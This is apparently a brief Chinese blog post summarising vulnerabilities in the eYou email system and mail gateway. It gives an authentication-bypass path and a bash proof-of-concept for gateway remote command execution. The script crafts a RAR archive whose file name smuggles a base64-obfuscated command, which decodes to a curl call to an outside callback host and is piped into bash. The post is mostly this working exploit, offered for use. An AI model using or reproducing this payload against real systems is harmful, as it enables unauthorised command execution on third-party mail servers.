亿邮相关漏洞总结

  1. 亿邮电子邮件系统远程命令执行漏洞

    1.   疑似0day,未知详情

  2. 亿邮电子邮件系统认证逻辑缺陷

    1.   利用路径:/?q=login.do

  3. 亿邮邮件网关 RCE

    1. 利用路径:/usr/local/eyou/gateway/ebaselib/bin/pdftotext
    2. 验证方式: 
      #!/bin/bash
PAYLOAD_NAME="testpoc.pdf\`{echo Y3VybCBodHRwOi8vc2R5eWE0Mm4uZG5zLmFkeXNlYy5jb20K}|{base64 -d}|bash\`"
WORKDIR=$(mktemp -d)
cd "$WORKDIR" || exit 1
echo -n "12345" > "$PAYLOAD_NAME"
OUTPUT_RAR="payload_testpoc.rar"
rar a -ma5 -m0 -ep "$OUTPUT_RAR" "$PAYLOAD_NAME"
mv "$OUTPUT_RAR" "$OLDPWD"
echo "[+] Done: $OUTPUT_RAR created."
rm -rf "$WORKDIR"
posted @ 2025-07-27 08:41  r1ch4rd_L  阅读(336)  评论(1)    收藏  举报